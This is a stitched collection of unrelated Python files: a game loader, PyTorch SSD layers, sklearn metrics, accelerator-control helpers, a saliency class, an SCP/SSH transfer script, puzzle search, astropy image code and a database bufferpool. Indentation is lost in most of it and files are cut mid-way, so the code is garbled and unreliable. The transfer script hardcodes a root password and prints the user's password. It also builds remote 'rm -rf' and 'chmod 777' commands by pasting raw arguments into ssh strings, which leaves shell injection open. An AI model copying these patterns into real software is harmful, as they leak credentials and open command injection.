load_game_frame = LoadGameFrame(w, self)
load_game_frame.grid()
load_game_frame.grab_set()
def start_new(self, new_db):
set_world(new_db)
player_actor_frame = PlayerActorFrame(self)
current_location_frame = CurrentLocationFrame(self)
self.main_notebook.add(player_actor_frame, text='Character')
self.main_notebook.add(current_location_frame, text='Location')
self.main_notebook.hide(self.editor_frame)
self.main_notebook.bind('<<NotebookTabChanged>>', player_actor_frame.refresh)
def create_new_save(self, name, player_actor):
new_dir = 'saves\\' + name
os.makedirs(new_dir)
new_db = new_dir + '\\database.db'
shutil.copyfile('database.db', new_db)
        with open(new_dir + '\\save.info', mode='w') as f:
            f.write(str(player_actor.actor_id))
world.player_actor = player_actor
self.start_new(new_db)
def load_save(self, name):
        with open('saves\\' + name + '\\save.info', mode='r') as f:
            actor_id = int(f.readline())
world.set_player_actor_id(actor_id)
new_db = 'saves\\' + name + '\\database.db'
self.start_new(new_db)
app = Application()
app.master.title("CBS")
app.mainloop()
|
import tarfile
import os
import sys
import pickle
#import tensorflow as tf
from datetime import datetime
from multiprocessing import Pool
import getopt
from itertools import repeat
import psutil
sys.path.append('../../lib/')
import return_type_lib
import common_stuff_lib
import tarbz2_lib
import pickle_lib
#import disassembly_lib
#import tfrecord_lib
def check_config(config):
if config['base_dir'] == '':
print(f'Please specify a base-dir (-b or --base-dir) , where all work is done. Check -h for help.')
print()
exit()
def main():
config = common_stuff_lib.parseArgs()
print(f'config >{config}<')
print()
check_config(config)
nr_of_cpus = psutil.cpu_count(logical=True)
print(f'We got >{nr_of_cpus}< CPUs for threading')
print()
print(f"Using files in directory >{config['tfrecord_save_dir']}<")
print()
return_type_dict = pickle_lib.get_pickle_file_content(config['tfrecord_save_dir'] + 'return_type_dict.pickle')
print(f'return_type_dict value >{return_type_dict}<')
print()
vocabulary_list= pickle_lib.get_pickle_file_content(config['tfrecord_save_dir'] + 'vocabulary_list.pickle')
print(f'vocabulary_list >{vocabulary_list}<')
print()
print(f'vocabulary_list length >{len(vocabulary_list)}<')
print()
max_seq_length = pickle_lib.get_pickle_file_content(config['tfrecord_save_dir'] + 'max_seq_length.pickle')
print(f'max_seq_length >{max_seq_length}<')
if __name__ == "__main__":
main()
|
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
from torch.autograd import Function
def make_vgg(image_size):
layers = []
    in_channels = 3  # number of color channels
    cfg = [  # define the layer structure as a list  # could probably be unified?
64, 64, 'M',
128, 128, 'M',
256, 256, 256, 'M', ## fix MC -> M
512, 512, 512, 'M',
512, 512, 512
]
if image_size == 300:
cfg = [
64, 64, 'M',
128, 128, 'M',
256, 256, 256, 'MC',
512, 512, 512, 'M',
512, 512, 512
]
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
elif v == 'MC':
layers += [nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
pool5 = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)
conv6 = nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6)
conv7 = nn.Conv2d(1024, 1024, kernel_size=1)
layers += [pool5, conv6, nn.ReLU(inplace=True),
conv7, nn.ReLU(inplace=True)]
return nn.ModuleList(layers)
def make_extras():
layers = []
    in_channels = 1024  # number of image channels output by the vgg module and fed into the extras
cfg = [256, 512,
128, 256,
128, 256,
128, 256]
layers += [nn.Conv2d(in_channels, cfg[0], kernel_size=(1))]
layers += [nn.Conv2d(cfg[0], cfg[1], kernel_size=(3), stride=2, padding=1)]
layers += [nn.Conv2d(cfg[1], cfg[2], kernel_size=(1))]
layers += [nn.Conv2d(cfg[2], cfg[3], kernel_size=(3), stride=2, padding=1)]
layers += [nn.Conv2d(cfg[3], cfg[4], kernel_size=(1))]
layers += [nn.Conv2d(cfg[4], cfg[5], kernel_size=(3))]
layers += [nn.Conv2d(cfg[5], cfg[6], kernel_size=(1))]
layers += [nn.Conv2d(cfg[6], cfg[7], kernel_size=(3))]
return nn.ModuleList(layers)
def make_loc_conf(num_classes=21, bbox_aspect_num=(4, 6, 6, 6, 4, 4)):
loc_layers = []
cnf_layers = []
# VGG
    # (source1) convolution layers applied to conv4_3 (layer 22) of VGG
loc_layers += [nn.Conv2d(512, bbox_aspect_num[0] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(512, bbox_aspect_num[0] * num_classes, kernel_size=3, padding=1)]
    # (source2) convolution layers applied to the final VGG layer
loc_layers += [nn.Conv2d(1024, bbox_aspect_num[1] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(1024, bbox_aspect_num[1] * num_classes, kernel_size=3, padding=1)]
# extras
# (source3)
loc_layers += [nn.Conv2d(512, bbox_aspect_num[2] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(512, bbox_aspect_num[2] * num_classes, kernel_size=3, padding=1)]
# (source4)
loc_layers += [nn.Conv2d(256, bbox_aspect_num[3] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(256, bbox_aspect_num[3] * num_classes, kernel_size=3, padding=1)]
# (source5)
loc_layers += [nn.Conv2d(256, bbox_aspect_num[4] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(256, bbox_aspect_num[4] * num_classes, kernel_size=3, padding=1)]
# (source6)
loc_layers += [nn.Conv2d(256, bbox_aspect_num[5] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(256, bbox_aspect_num[5] * num_classes, kernel_size=3, padding=1)]
return nn.ModuleList(loc_layers), nn.ModuleList(cnf_layers)
class L2Norm(nn.Module):
def __init__(self, input_channels=512, scale=20):
        super(L2Norm, self).__init__()  # run the parent class constructor
        self.weight = nn.Parameter(torch.Tensor(input_channels))
        self.scale = scale  # value used to initialize the weight coefficients
        self.reset_parameters()  # initialize the parameters
self.eps = 1e-10
def reset_parameters(self):
        init.constant_(self.weight, self.scale)  # every weight value becomes scale (=20)
def forward(self, x):
norm = x.pow(2).sum(dim=1, keepdim=True).sqrt() + self.eps
x = torch.div(x, norm)
weights = self.weight.unsqueeze(
0).unsqueeze(2).unsqueeze(3).expand_as(x)
out = weights * x
return out
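# --- Minimal sanity-check sketch (not part of the original file) ---
# Builds the module lists defined above and pushes a dummy batch through the
# VGG trunk; the expected shape is only indicative.
if __name__ == '__main__':
    vgg = make_vgg(300)
    extras = make_extras()
    loc_layers, conf_layers = make_loc_conf()
    x = torch.randn(1, 3, 300, 300)
    for layer in vgg:
        x = layer(x)
    print(x.shape)  # roughly (1, 1024, 19, 19) for a 300x300 input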
|
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import sklearn.metrics as metrics
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.model_selection import learning_curve
from sklearn.tree import DecisionTreeClassifier
def model_eval(y_test, y_pred):
f1 = f1_score(y_test, y_pred)
precision = precision_score(y_test, y_pred)
recall = recall_score(y_test, y_pred)
acc = accuracy_score(y_test, y_pred)
print(f"F1 score: {round(f1, 4)}"),
print(f"Precision: {round(precision, 4)}"),
print(f"Recall: {round(recall, 4)}"),
print(f"Accuracy: {round(acc, 4)}"),
return
def plot_learning_curve(X, y, maxdepth, plt):
# create cv training and test scores for various training set sizes
train_sizes, train_scores, test_scores = learning_curve(
DecisionTreeClassifier(max_depth=maxdepth, random_state=42),
X, # feature matrix
y, # target vector
cv=5, # number of folds in cross-validation
scoring="f1", # metric
#scoring="neg_mean_squared_error", # metric
n_jobs=-1, # use all computer cores,
train_sizes=np.linspace(
0.01, 1.0, 30
), # 30 different sizes of the training set
)
    # create means and standard deviations of training set scores
train_mean = np.mean(train_scores, axis=1)
train_std = np.std(train_scores, axis=1)
    # create means and standard deviations of test set scores
test_mean = np.mean(test_scores, axis=1)
test_std = np.std(test_scores, axis=1)
# draw lines
plt.plot(train_sizes, train_mean, "--", color="#111111", label="Training score")
plt.plot(train_sizes, test_mean, color="#111111", label="Cross-validation score")
# draw bands
plt.fill_between(
train_sizes, train_mean - train_std, train_mean + train_std, color="#DDDDDD"
)
plt.fill_between(
train_sizes, test_mean - test_std, test_mean + test_std, color="#f4d0d7"
)
# create plot
plt.title("Learning curve for Decision Tree")
plt.xlabel("Training set size", fontsize=18)
plt.ylabel("F1 score", fontsize=18)
plt.legend(loc="best")
plt.tight_layout()
return
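# --- Usage sketch (not part of the original file) ---
# Illustrative only: fits a tree on synthetic data, prints the metrics with
# model_eval, then draws the learning curve with the helper above.
if __name__ == "__main__":
    from sklearn.datasets import make_classification
    from sklearn.model_selection import train_test_split
    X, y = make_classification(n_samples=2000, n_features=20, random_state=42)
    X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
    clf = DecisionTreeClassifier(max_depth=4, random_state=42).fit(X_train, y_train)
    model_eval(y_test, clf.predict(X_test))
    plot_learning_curve(X, y, maxdepth=4, plt=plt)
    plt.show()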
|
# Helper classes for TMBF control
import cothread
from cothread.catools import *
class TMBF:
def __init__(self, name):
self.tmbf = name
self.s1 = Trigger(self, 'S1')
self.s2 = Trigger(self, 'S2')
self.ext = Trigger(self, 'EXT')
self.saves = {}
def pv(self, name):
return '%s:%s' % (self.tmbf, name)
def PV(self, name):
return PV(self.pv(name))
def set_save(self, name, value):
self.saves[name] = self.get(name)
caput(self.pv(name), value, wait=True)
def set(self, name, value):
caput(self.pv(name), value, wait=True)
def get(self, name):
return caget(self.pv(name), format = FORMAT_TIME)
def monitor(self, name, on_update, **kargs):
return camonitor(self.pv(name), on_update, **kargs)
def restore_saved(self):
for name, value in self.saves.items():
self.set(name, value)
def reset_saved(self):
self.saves = {}
class Trigger:
def __init__(self, tmbf, trigger):
assert trigger in ['S1', 'S2', 'EXT']
self.tmbf = tmbf
self.trigger = trigger
tmbf.monitor('TRG:%s:STATUS' % trigger,
self.__update_status, datatype = str, all_updates = True)
self.state = 'Unknown'
self.event = cothread.Event()
def __update_status(self, value):
self.state = value
self.event.Signal()
def wait_for(self, state, timeout=5):
timeout = cothread.AbsTimeout(timeout)
while self.state != state:
self.event.Wait(timeout)
def arm(self, timeout=5):
timeout = cothread.AbsTimeout(timeout)
self.state = 'Waiting'
arm_name = {'S1':'FIRE', 'S2':'FIRE', 'EXT':'ARM'}[self.trigger]
self.tmbf.set('TRG:%s:%s_S.PROC' % (self.trigger, arm_name), 0)
self.wait_for('Busy', timeout)
self.wait_for('Ready', timeout)
|
from django.urls import path
from .views import ArticleListView, ArticleDetailView
urlpatterns = [
path('list/', ArticleListView.as_view(), name='list_of_articles'),
path('<int:pk>/', ArticleDetailView.as_view(), name='article_detail'),
]
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
class Saliency:
"""Generate saliency map from RGB images with the spectral residual method
This class implements an algorithm that is based on the spectral
residual approach (Hou & Zhang, 2007).
"""
def __init__(self, img, use_numpy_fft=True, gauss_kernel=(5, 5)):
"""Constructor
This method initializes the saliency algorithm.
:param img: an RGB input image
:param use_numpy_fft: flag whether to use NumPy's FFT (True) or
OpenCV's FFT (False)
:param gauss_kernel: Kernel size for Gaussian blur
"""
self.use_numpy_fft = use_numpy_fft
self.gauss_kernel = gauss_kernel
self.frame_orig = img
# downsample image for processing
self.small_shape = (64, 64)
self.frame_small = cv2.resize(img, self.small_shape[1::-1])
# whether we need to do the math (True) or it has already
# been done (False)
self.need_saliency_map = True
def get_saliency_map(self):
"""Returns a saliency map
This method generates a saliency map for the image that was
passed to the class constructor.
:returns: grayscale saliency map
"""
if self.need_saliency_map:
# haven't calculated saliency map for this image yet
num_channels = 1
if len(self.frame_orig.shape) == 2:
# single channel
sal = self._get_channel_sal_magn(self.frame_small)
else:
# multiple channels: consider each channel independently
sal = np.zeros_like(self.frame_small).astype(np.float32)
                for c in range(self.frame_small.shape[2]):
small = self.frame_small[:, :, c]
sal[:, :, c] = self._get_channel_sal_magn(small)
# overall saliency: channel mean
sal = np.mean(sal, 2)
# postprocess: blur, square, and normalize
if self.gauss_kernel is not None:
sal = cv2.GaussianBlur(sal, self.gauss_kernel, sigmaX=8,
sigmaY=0)
sal = sal**2
sal = np.float32(sal) / np.max(sal)
# scale up
sal = cv2.resize(sal, self.frame_orig.shape[1::-1])
# store a copy so we do the work only once per frame
self.saliencyMap = sal
self.need_saliency_map = False
return self.saliencyMap
def _get_channel_sal_magn(self, channel):
"""Returns the log-magnitude of the Fourier spectrum
This method calculates the log-magnitude of the Fourier spectrum
of a single-channel image. This image could be a regular grayscale
image, or a single color channel of an RGB image.
:param channel: single-channel input image
:returns: log-magnitude of Fourier spectrum
"""
# do FFT and get log-spectrum
if self.use_numpy_fft:
img_dft = np.fft.fft2(channel)
magnitude, angle = cv2.cartToPolar(np.real(img_dft),
np.imag(img_dft))
else:
img_dft = cv2.dft(np.float32(channel),
flags=cv2.DFT_COMPLEX_OUTPUT)
magnitude, angle = cv2.cartToPolar(img_dft[:, :, 0],
img_dft[:, :, 1])
# get log amplitude
log_ampl = np.log10(magnitude.clip(min=1e-9))
# blur log amplitude with avg filter
log_ampl_blur = cv2.blur(log_ampl, (3, 3))
# residual
residual = np.exp(log_ampl - log_ampl_blur)
# back to cartesian frequency domain
if self.use_numpy_fft:
real_part, imag_part = cv2.polarToCart(residual, angle)
img_combined = np.fft.ifft2(real_part + 1j * imag_part)
magnitude, _ = cv2.cartToPolar(np.real(img_combined),
np.imag(img_combined))
else:
img_dft[:, :, 0], img_dft[:, :, 1] = cv2.polarToCart(residual,
angle)
img_combined = cv2.idft(img_dft)
magnitude, _ = cv2.cartToPolar(img_combined[:, :, 0],
img_combined[:, :, 1])
return magnitude
def get_proto_objects_map(self, use_otsu=True):
"""Returns the proto-objects map of an RGB image
This method generates a proto-objects map of an RGB image.
Proto-objects are saliency hot spots, generated by thresholding
the saliency map.
:param use_otsu: flag whether to use Otsu thresholding (True) or
a hardcoded threshold value (False)
:returns: proto-objects map
"""
saliency = self.get_saliency_map()
if use_otsu:
_, img_objects = cv2.threshold(np.uint8(saliency * 255), 0, 255,
cv2.THRESH_BINARY + cv2.THRESH_OTSU)
else:
thresh = np.mean(saliency) * 255 * 3
_, img_objects = cv2.threshold(np.uint8(saliency * 255), thresh, 255,
cv2.THRESH_BINARY)
return img_objects
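# --- Usage sketch (not part of the original file) ---
# The image path below is a placeholder; any BGR image loaded with OpenCV works.
if __name__ == '__main__':
    img = cv2.imread('example.jpg')  # hypothetical path
    if img is not None:
        sal = Saliency(img, gauss_kernel=(5, 5))
        cv2.imshow('saliency map', sal.get_saliency_map())
        cv2.imshow('proto-objects', sal.get_proto_objects_map())
        cv2.waitKey(0)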
|
import sys, re,time
#from pexpect import *
import sys,os
sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'sharedlib'))
import getpass, re, time
from sharedlib.sitepackages import pexpect
run = pexpect.run  # the bare run() calls below rely on pexpect's run helper
print len(sys.argv)
size = 7
try:
if sys.argv[1] == "-h" or sys.argv[1] == "--help":
print """
TransferSegmenter <file_path_name_of_tar> <file_name_to_copy> <host_user> <host_ip> <host_file_path_name> <host_password>
Ex TransferSegmenter /home/release.tar.gz azuki root 10.100.25.19 /home/jenkins_build ******
"""
else:
"""
Logging in to the Server PC where the streams are kept
"""
if len(sys.argv) == int(size):
path_filename = sys.argv[1]
username = sys.argv[3]
hostname = sys.argv[4]
remotepath = sys.argv[5]
password = sys.argv[6]
filename = path_filename.split('/')[-1]
binary_name = sys.argv[2]
print path_filename,filename,username,hostname,remotepath,password
#print check
child1=pexpect.spawn( "scp "+path_filename+" "+username+"@"+hostname+":/"+remotepath+"/" )
try:
child1.expect ( "password" )
except:
child1.expect ( '(yes/no)' )
child1.sendline ( "yes" )
child1.expect ( 'password' )
child1.sendline ( ""+password+"\n" )
child2=pexpect.spawn( "ssh "+username+"@"+hostname+"" )
try:
child2.expect ( "password" )
except:
child2.expect ( '(yes/no)' )
child2.sendline ( "yes" )
child2.expect ( 'password' )
child2.sendline ( ""+password+"\n" )
child2.close()
child3=pexpect.spawn( "ssh root@127.0.0.1" )
try:
child3.expect ( "password" )
except:
child3.expect ( '(yes/no)' )
child3.sendline ( "yes" )
child3.expect ( 'password' )
child3.sendline ( "rebaca\n" )
child3.close()
(check, exitstatus) = run("ssh root@127.0.0.1 'ps aux | grep [s]cp | grep "+remotepath+"",events={'(?i)password':'rebaca\n'}, withexitstatus=1)
#print check
text_found = re.search(r""+remotepath+"", check)
#print text_found
while(text_found != None):
#print "start"
(capture, exitstatus) = run("ssh root@127.0.0.1 'ps aux | grep [s]cp | grep "+remotepath+"'",events={'(?i)password':'rebaca\n'}, withexitstatus=1)
print "copy in progress............."
text_found = re.search(r""+remotepath+"", capture)
time.sleep(2)
try:
(check, exitstatus) = run("ssh "+username+"@"+hostname+" 'ls -lah "+remotepath+"/ | grep "+filename+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
except:
print "permission issue"
#print check
text_found = re.search(r""+filename+"", check)
#print text_found
if (text_found != None):
print "File Copied Successfully"
else:
print "File Not Copied"
"""
checking for the type of compression format
"""
compress_format_zip = re.search(r".zip", filename)
compress_format_tar_gz = re.search(r".tar.gz", filename)
compress_format_tgz = re.search(r".tgz", filename)
compress_format_rar = re.search(r".rar", filename)
if compress_format_zip != None:
(check, exitstatus) = run("ssh "+username+"@"+hostname+" 'cd "+remotepath+";rm -rf "+filename[:-4]+";unzip "+filename+";cp "+filename[:-4]+"/"+binary_name+" "+remotepath+";rm -rf "+filename+";rm -rf "+filename[:-4]+";chmod 777 "+binary_name+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
            elif compress_format_tar_gz != None:
(check, exitstatus) = run("ssh "+username+"@"+hostname+" 'cd "+remotepath+";rm -rf "+filename[:-7]+";tar -xvzf "+filename+";cp "+filename[:-7]+"/"+binary_name+" .;rm -rf "+filename+";rm -rf "+filename[:-7]+";chmod 777 "+binary_name+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
elif compress_format_tgz != None:
(check, exitstatus) = run("ssh "+username+"@"+hostname+" 'cd "+remotepath+";rm -rf "+filename[:-4]+";tar -xvzf "+filename+";cp "+filename[:-4]+"/"+binary_name+" .;rm -rf "+filename+";rm -rf "+filename[:-4]+";chmod 777 "+binary_name+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
elif compress_format_rar != None:
(check, exitstatus) = run("ssh "+username+"@"+hostname+" 'cd "+remotepath+";rm -rf "+filename[:-4]+";unrar e "+filename+";cp "+filename[:-4]+"/"+binary_name+" .;rm -rf "+filename+";rm -rf "+filename[:-4]+";chmod 777 "+binary_name+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
else:
print "NO format matched"
#print check
#(check, exitstatus) = run("ssh "+username_AS+"@"+hostname_AS+" '"+automation_command+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
child1.close()
else:
print "please provide complete command"
except:
print "Command line argument are not complete OR you have quited in between"
|
import header as h
def add_nodes(g, nodes):
for el in nodes:
        g[el] = dict()  # add each node as a key with an empty adjacency dict
#g.add_nodes_from(list(range(1, h.NUM_VERTEX+1)))#add a list of node prom 1 to the max number of nodes
def add_phisical_distance_edges(g):
with open(h.PATH_DISTANCE, 'r') as distances:
for row in distances:
            row = row[2:]  # remove the initial 'a'
comp=list(map(int, row.split()))
adj=g.get(comp[0])
if adj==None:
g[comp[0]]={comp[1]:comp[2]}
else:
g[comp[0]][comp[1]]=comp[2]
#g.add_edge(comp[0], comp[1], weight=comp[2])
def add_time_distance_edges(g):
with open(h.PATH_TIME, 'r') as times:
for row in times:
            row = row[2:]  # remove the initial 'a'
comp=list(map(int, row.split()))
adj=g.get(comp[0])
if adj==None:
g[comp[0]]={comp[1]:comp[2]}
else:
g[comp[0]][comp[1]]=comp[2]
#g.add_edge(component[0], component[1], weight=component[2])
def add_network_distance_edges(g):
with open(h.PATH_TIME, 'r') as times:
for row in times:
            row = row[2:]  # remove the initial 'a'
comp=list(map(int, row.split()))
adj=g.get(comp[0])
if adj==None:
g[comp[0]]={comp[1]:1}
else:
g[comp[0]][comp[1]]=1
#g.add_edge(component[0], component[1], weight=1)
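# --- Usage sketch (not part of the original module) ---
# Assumes header.py (imported as h) defines NUM_VERTEX, PATH_DISTANCE and
# PATH_TIME pointing at DIMACS-style "a <from> <to> <weight>" edge files.
#
# g = dict()
# add_nodes(g, range(1, h.NUM_VERTEX + 1))
# add_phisical_distance_edges(g)
# print(len(g), "nodes loaded")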
|
"""
This module exposes an endpoint to retrieve stats for the API requests
"""
import json
from flask import Response, Blueprint
from utils import DB
STATS_BLUEPRINT = Blueprint('stats', __name__)
@STATS_BLUEPRINT.route('/api/v1/stats', methods=['GET'])
def stats():
"""
This function returns the API stats
"""
queries = {}
slow_requests = {}
# Retrieve items from MongoDB
query_items = DB.queries.find()
slow_queries = DB.slow_requests.find()
# Create a dict from the data retrieved
for item in query_items:
queries[item['url']] = item['count']
for item in slow_queries:
slow_requests[item['url']] = item['time']
resp = {
'slow_requests': slow_requests,
'queries': queries
}
return Response(json.dumps(resp), status=200, mimetype='application/json')
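# --- Usage sketch (not part of the original module) ---
# A hedged example of mounting this blueprint on an app; it assumes MongoDB is
# reachable through utils.DB.
#
# from flask import Flask
# app = Flask(__name__)
# app.register_blueprint(STATS_BLUEPRINT)
# app.run()  # GET /api/v1/stats then returns the queries and slow_requests dicts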
|
from Common import mod, stateToHash  # assumes Common provides these move/hash helpers used below
def getNewNodes(cur, vis):
nodes = []
nodes.append(Node(mod(cur.curState, 'u'), cur, cur.depth +1))
nodes.append(Node(mod(cur.curState, 'r'), cur, cur.depth +1))
nodes.append(Node(mod(cur.curState, 'd'), cur, cur.depth +1))
nodes.append(Node(mod(cur.curState, 'l'), cur, cur.depth +1))
nodes = [node for node in nodes if node.curState != None and stateToHash(node.curState) not in vis]
return nodes
def display_board( state ):
print "-------------"
print "| %i | %i | %i |" % (state[0][0], state[0][1], state[0][2])
print "-------------"
print "| %i | %i | %i |" % (state[1][0], state[1][1], state[1][2])
print "-------------"
print "| %i | %i | %i |" % (state[2][0], state[2][1], state[2][2])
print "------------"
def getPath(node):
temp = node
moves = []
while temp != None:
moves.insert(0, temp.curState)
temp = temp.parent
return moves
def dfs(start, goal, depth):
nodes = []
nodes.insert(0, Node(start, None, 0))
visited = []
count = 0
while True:
if len(nodes) == 0:
return {'node':None, 'count':count }
node = nodes.pop()
if node.curState == goal:
return {'node':node, 'count':count }
visited.append(stateToHash(node.curState))
if node.depth < depth :
newNodes = getNewNodes(node, visited)
count = count + 1
newNodes.extend(nodes)
nodes = newNodes
def idfs(start, goal):
count = 0
for i in range(0, 32):
solution = dfs(start, goal, i)
count = count + solution['count']
if solution['node'] != None:
for step in getPath(solution['node']):
display_board(step)
print "solution found at depth %i" % (i)
print "Expanded %i nodes " % (count)
return
print "No solution found for depth range [0,32]"
print "Expanded %i nodes " % (count)
def dfs_main(start, goal):
solution = dfs(start, goal, 32)
for step in getPath(solution['node']):
display_board(step)
print "Expanded %i nodes " % (solution['count'])
class Node:
def __init__( self, state, parent, depth):
self.curState = state
self.parent = parent
self.depth = depth
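# --- Usage sketch (not part of the original file) ---
# Assumes Common provides mod(state, move) and stateToHash(state); the boards
# below are illustrative 3x3 states with 0 as the blank tile.
#
# start = [[1, 2, 3], [4, 0, 5], [6, 7, 8]]
# goal = [[1, 2, 3], [4, 5, 6], [7, 8, 0]]
# idfs(start, goal)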
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 12 14:00:59 2017
Code for degrading images
@author: ppxee
"""
### Import required libraries ###
#import matplotlib.pyplot as plt #for plotting
from astropy.io import fits #for handling fits
import numpy as np #for handling arrays
from astropy.convolution import Gaussian2DKernel
from astropy.convolution import convolve
#from scipy import ndimage
#import math
#from astropy.stats import median_absolute_deviation
def FWHM2sigma(FWHM):
''' Function to convert the FWHM of a distribution into a sigma for that
distribution. It assumes the distribution is gaussian.
Input:
        FWHM = Full width half maximum of a distribution (in my case usually
of an object from SExtractor)
Output:
        sigma = standard deviation value of a gaussian distribution with the
given FWHM. This roughly equates to the psf of the object. '''
hdr08B = fits.getheader('UDS_08B_K.fits')
const = hdr08B['CD1_1'] # constant that defines unit conversion for FWHM
FWHM /= const
return FWHM/np.sqrt(8*np.log(2))
sem05B = fits.open('SE_outputs_yearstacks/05B_output.fits')[1].data
sem07B = fits.open('SE_outputs_yearstacks/07B_output.fits')[1].data
sem08B = fits.open('SE_outputs_yearstacks/08B_output.fits')[1].data
sem09B = fits.open('SE_outputs_yearstacks/09B_output.fits')[1].data
sem10B = fits.open('SE_outputs_yearstacks/10B_output.fits')[1].data
sem11B = fits.open('SE_outputs_yearstacks/11B_output.fits')[1].data
sem12B = fits.open('SE_outputs_yearstacks/12B_output.fits')[1].data
#sem05B = fits.open('05B_output.fits')[1].data
#sem07B = fits.open('07B_output.fits')[1].data
#sem08B = fits.open('08B_output.fits')[1].data
#sem09B = fits.open('09B_output.fits')[1].data
#sem10B = fits.open('10B_output.fits')[1].data
#sem11B = fits.open('11B_output.fits')[1].data
#sem12B = fits.open('12B_output.fits')[1].data
colname = 'FWHM_WORLD'
#Put data in array
avgFWHM = np.array([np.mean(sem05B[colname]), np.mean(sem07B[colname]),
np.mean(sem08B[colname]), np.mean(sem09B[colname]),
np.mean(sem10B[colname]), np.mean(sem11B[colname]),
np.mean(sem12B[colname])])
### Find maximum FWHM as this is what all the others will become ###
aimind = np.argmax(avgFWHM)
### Convert FWHM into a sigma ###
sigmaold = np.array([FWHM2sigma(fwhm) for fwhm in avgFWHM])
sigmabroad = sigmaold[aimind]
### Find required sigma ###
# sigker^2 = sigbroad^2 - signar^2
sigmakernel = np.array([np.sqrt(sigmabroad**2 - sigma**2) for sigma in sigmaold])
### Open images ###
#im05Bfull = fits.open('UDS_05B_K_bin2x2.fits', memmap=True)
#im05B = im05Bfull[0].data
#hdr = im05Bfull[0].header
### Convolve Images ###
kernel05B = Gaussian2DKernel(sigmakernel[0])
#newim05B = convolve(im05B, kernel05B)
#im05Bfull[0].data = newim05B
### Save the file ###
#hdu = fits.PrimaryHDU(newim05B, header=hdr)
#hdulist = fits.HDUList([hdu])
#hdulist.writeto('new_UDS_05B_K_bin2x2.fits', overwrite=True)
#
#### CLose the file ###
#im05Bfull.close()
#del im05Bfull[0].data
|
import os
import threading
# Global Setting for the Database
# PageSize, StartRID, etc..
# Element(byte, byte, byte, byte, byte, byte, byte, '\x00') # 8 "bytes" in one "element" Note that only 7 of the bytes can be written to!
# PhysicalPage(Element, Element, Element, ...) # 512 "element"s in one "PhysicalPage"
# BasePage(PhysicalPage, PhysicalPage, PhysicalPage, ...) # 9 (4 are meta filled, 5 are data filled) "PhysicalPage"s in one "BasePage"
# PageRange(BasePage, BasePage, BasePage, ...) # 16 "BasePage"s in one "PageRange"
def init():
pass
BytesPerElement = 8
PhysicalPageBytes = 4096
# aka records per base page
ElementsPerPhysicalPage = int(PhysicalPageBytes / BytesPerElement)
MetaElements = 4
# When we get this many filled-up tail pages, merge
MergePolicy = 25
PagesPerPageRange = 16
# records per base page * number of base pages per range = records per page range
RecordsPerPageRange = int(PagesPerPageRange * ElementsPerPhysicalPage)
BufferpoolSize = 16
INVALID = 72057594037927935 # (max int for 7 bytes, hexadecimal: 0xFFFFFFFFFFFFFF)
threads = []
# global must be defined after class definition (its just under it)
class Bufferpool():
def __init__(self):
self.bufferpool = [None]*BufferpoolSize
self.latch = threading.Lock()
pass
def BufferpoolIsFull(self):
return not any(spot is None for spot in self.bufferpool)
# this way passes in an index
def refresh(self, index):
#Find the Page that has this path in the bufferpool, then refresh its age, and increment the other pages in bufferpool age
for spot in self.bufferpool:
if not spot is None:
if spot.path == self.bufferpool[index].path:
spot.age = 1
spot.pinned += 1
else:
spot.age += 1
return index
def add(self, page):
if (self.BufferpoolIsFull()):
self.kick()
for index, spot in enumerate(self.bufferpool):
if spot is None:
self.bufferpool[index] = page
self.refresh(index) #on the way in, we set the age to 1 and update the other ages
return index
raise Exception("Bufferpool Error: couldn't find empty spot after kicking.")
def kick(self):
oldest = 0 # note that the minimum age is 1
for index, spot in enumerate(self.bufferpool):
if not spot is None:
if (spot.pinned == 0):
if(self.bufferpool[index].age > oldest):
oldest = self.bufferpool[index].age
index_oldest = index
if oldest == 0:
raise Exception("Bufferpool Error: all pages in the bufferpool are pinned.")
kicked = self.bufferpool[index_oldest]
kicked.age = 1 #on the way out, we set the age to 1
self.bufferpool[index_oldest] = None
if (kicked.dirty):
if not os.path.exists(kicked.path):
os.mkdir(kicked.path)
kicked.writePageToDisk(kicked.path)
def kickAll(self):
empty = [None]*BufferpoolSize
while self.bufferpool != empty:
self.kick()
def pathInBP(self, path):
for index, spot in enumerate(self.bufferpool):
if not spot is None:
if (spot.path == path):
return index
return None
global BP
BP = Bufferpool()
# whole record locked from base record
class RecordLock():
def __init__(self):
self.sLocks = 0
self.xLocks = 0
self.isShrinking = False
self.inUseBy = []
# lock then unlock all functions since they are critical sections in a shared data structure
class LockManager():
def __init__(self):
# hash table mapping RIDs to list of S lock, X lock, bool isShrinkingPhase
# - if we see there's already an exclusive lock on that RID, we abort
# - otherwise, increment number of shared locks
self.latch = threading.Lock()
self.KeytoLocks = {}
        self.transactionID = -1 # counter used to hand out unique transaction IDs
def getTransactionID(self):
self.transactionID += 1
return self.transactionID
# return false if X lock already present or we're in shrinking phase
# - once one shared lock is given up, all of them have to be given up before more can be given out
# i. This is so Xlocks can be given out at some point
def obtainSLock(self, Key, transactionID):
giveLock = False
if Key not in self.KeytoLocks:
self.KeytoLocks[Key] = RecordLock()
